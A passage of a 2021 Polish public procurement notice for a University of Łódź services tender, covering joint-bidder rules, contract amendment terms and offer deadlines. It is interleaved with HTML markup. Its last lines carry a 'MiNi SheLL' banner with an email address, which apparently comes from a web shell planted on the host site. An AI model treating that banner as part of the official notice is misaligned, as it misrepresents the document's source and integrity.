spełnianie warunków udziału w<br/>postępowaniu, o których mowa w pkt. 8.1.2) ppkt d.2 SWZ Wykonawcy wykazują łącznie.<br/>3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie o którym mowa w pkt 9.1)a SWZ składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>4) Podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, natomiast podmiotowe<br/>środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu składa<br/>wykonawca, który wykazuje spełnianie warunku.<br/>5) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek<br/>o których mowa w pkt 8.1.2) ppkt d.1 SWZ zostanie spełniony jeżeli spełni go jeden z<br/>Wykonawców, natomiast każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na<br/>podstawach wskazanych w SWZ. Analogicznie w przypadku polegania przez Wykonawcę na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby celem<br/>wykazania spełnienia warunku, o którym mowa w pkt 8.1.2) ppkt d.1. SWZ - podmiot<br/>udostępniający musi spełnić ten warunek samodzielnie.<br/>6) W odniesieniu do warunków dotyczących doświadczenia Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają<br/>usługi, do realizacji których zdolności są wymagane.<br/>7) W przypadku, o którym mowa w pkt 16.6) SWZ, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni Wykonawcy (oświadczenie to zawarte jest w Formularzu oferty w pkt. 7.7 <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Istotne zmiany zawartej umowy wymagają przeprowadzenia nowego postępowania o<br/>udzielenie zamówienia. Zmiana umowy jest istotna, jeżeli powoduje, że charakter umowy<br/>zmienia się w sposób istotny w stosunku do pierwotnej umowy, w szczególności zmiana dotyczy<br/>okoliczności, o których mowa w art. 454 ust. 2 ustawy Pzp.<br/>2. Dopuszcza się zmiany postanowień zawartej umowy w przypadku:<br/>1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na<br/>realizację umowy, w tym zmiany ustawowej stawki podatku VAT -Wykonawca jest uprawniony<br/>złożyć Za¬mawiają-cemu pisemny wniosek o zmianę umowy w zakresie płatności wynikających<br/>faktur wystawionych po wej¬ściu w życie przepisów zmieniających stawkę podatku od towarów i<br/>usług. Wniosek powinien zawierać wy¬czerpujące uzasadnienie faktyczne i wskazanie podstaw<br/>prawnych zmiany stawki podatku od towarów i usług oraz dokładne wyliczenie kwoty<br/>wynagrodzenia należnego Wykonawcy po zmianie umowy. Wniosek może obejmować jedynie<br/>dodatkowe koszty realizacji umowy, które Wykonawca obowiązkowo ponosi w związku ze<br/>zmianą stawki podatku od towarów i usług;<br/>2) zmiany formy prawnej prowadzonej działalności gospodarczej,<br/>3) zmiany adresu siedziby firmy, adresu zamieszkania właściciela lub współwłaściciela firmy, nr<br/>konta bankowego,<br/>4) w przypadku, gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę w wyniku<br/>sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia,<br/>podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia<br/>dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia<br/>warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie<br/>pociąga to za sobą istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania<br/>przepisów ustawy Pzp lub w wyniku przejęcia przez Zamawiającego zobowiązań wykonawcy<br/>względem jego podwykonawców, w przypadku, o którym mowa w art. 465 ust 1 ustawy Pzo<br/>5) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający,<br/>działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego<br/>charakteru umowy, a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50 %<br/>wartości pierwotnej umowy,<br/>6) zmiany umowy, których łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa<br/>niż 10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru<br/>umowy,<br/>7) zmiany umowy poprzez zmianę miejsca świadczenia usług polegającej na dodaniu nowych obiektów/siedzib, jednostek organizacyjnych UŁ do Wykazu obiektów przewidzianych do<br/>zabiegów lub zmiany miejsca siedziby lub wykreślenia obiektu z ww. Wykazu.<br/>3. Ewentualne, dopuszczone prawem, zmiany umowy inne niż określone w §9, pod rygorem<br/>nieważności, wymagają formy pisemnej, w postaci aneksu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi w SWZ dokumentami należy umieścić naPlatformie pod adresem https://platformazakupowa.pl/pn/uni.lodz na stronie dotyczącej odpowiedniegopostępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-10</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-04 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com